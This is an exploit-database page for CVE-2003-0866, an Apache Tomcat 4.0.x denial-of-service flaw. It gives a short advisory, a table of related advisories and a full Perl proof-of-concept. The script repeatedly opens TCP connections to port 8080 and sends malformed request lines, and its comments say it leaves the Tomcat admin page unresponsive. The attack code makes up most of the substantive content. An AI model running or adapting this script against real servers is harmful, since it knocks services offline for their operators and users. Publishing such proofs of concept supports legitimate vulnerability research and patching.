Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2003-0866 | 17 Oct 200304:00 | – | cve | |
| CVE-2003-0866 | 17 Oct 200304:00 | – | cvelist | |
| Debian DSA-395-1 : tomcat4 - incorrect input handling | 29 Sep 200400:00 | – | nessus | |
| Apache Tomcat 4.x < 4.1.0 Multiple Vulnerabilities | 4 Nov 201000:00 | – | nessus | |
| Apache Tomcat Denial of Service vulnerability in the Catalina package | 29 Apr 202201:27 | – | github | |
| CVE-2003-0866 | 17 Nov 200305:00 | – | nvd | |
| Debian: Security Advisory (DSA-395) | 17 Jan 200800:00 | – | openvas | |
| Debian Security Advisory DSA 395-1 (tomcat4) | 17 Jan 200800:00 | – | openvas | |
| DSA-395 tomcat4 - incorrect input handling | 15 Oct 200300:00 | – | osv | |
| GHSA-7WJ2-48C4-2684 Apache Tomcat Denial of Service vulnerability in the Catalina package | 29 Apr 202201:27 | – | osv |
10
source: https://www.securityfocus.com/bid/8824/info
Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types.
When certain non-HTTP request types are handled by the Tomcat HTTP connector, the Tomcat server will reject subsequent requests on the affected port until the service is restarted.
#!/usr/bin/perl
#
# PoC - DoS Exploit for Apache Tomcat 4
# by Oliver Karow - oliver.karowNOSPAM__AT__gmx.de
# http://www.oliverkarow.de/research/tomcat_crash.txt
#
# Run this script against the Tomcat Admin Port. After execution, the page will not be accessible any more.
# The port is still open and accepting connections, but not responding with content. To verify, connect with your browser
# to the port.
#
use IO::Socket;
$ip="192.168.0.16";
$port="8080";
$counter =0;
@attackpattern=("'");
for ($x=0;$x<=400;$x++){
$headerLine="GET /dummy/dontexist.pl? HTTP/1.0\n\n";
@temp=split(/(\/)/,$headerLine);
foreach (@temp){
$replaceme=$_;
foreach(@attackpattern){
$attack=$_;
$newheaderline=$headerLine;
$newheaderline=~ s/$replaceme/$attack/i;
$remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection not possible\n";
print $remote $newheaderline;
print "\nRequest: ".$counter++." \t".$newheaderline."\n";
$remote->close;
}
}
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.32657